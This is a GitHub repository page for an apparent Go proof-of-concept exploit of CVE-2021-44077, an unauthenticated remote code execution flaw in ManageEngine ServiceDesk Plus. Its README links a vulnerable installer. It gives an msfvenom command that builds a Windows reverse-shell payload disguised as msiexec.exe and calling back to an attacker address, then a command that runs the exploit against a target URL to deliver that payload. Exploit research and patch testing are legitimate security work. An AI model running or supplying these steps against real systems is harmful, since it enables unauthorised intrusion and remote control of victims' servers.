Skip to content
/ Golang-CVE-2021-44077-POC Public

Golang Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306

2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

pizza-power/Golang-CVE-2021-44077-POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
CVE-2021-44077.go
CVE-2021-44077.go
 
 
README.md
README.md
 
 

Repository files navigation

Golang-CVE-2021-44077-POC

This exploit is an unauthenticated RCE in Zoho ManageEngine ServiceDesk Plus < 11306.

You can find a vulnerable version of the software here: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe

I couldn't find a Golang version of this, so here it is. My code isn't great, so proceed at your own risk.

Blog post:

https://www.pizzapower.me/2022/09/29/golang-proof-of-concept-exploit-for-cve-2021-44077-preauth-rce-in-manageengine-servicedesk-plus-11306/

Running

Create a malicious payload in your current directory.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe

Then, run the exploit.

go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"

-u is the vulnerable URL -f is your malicious file

About

Golang Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages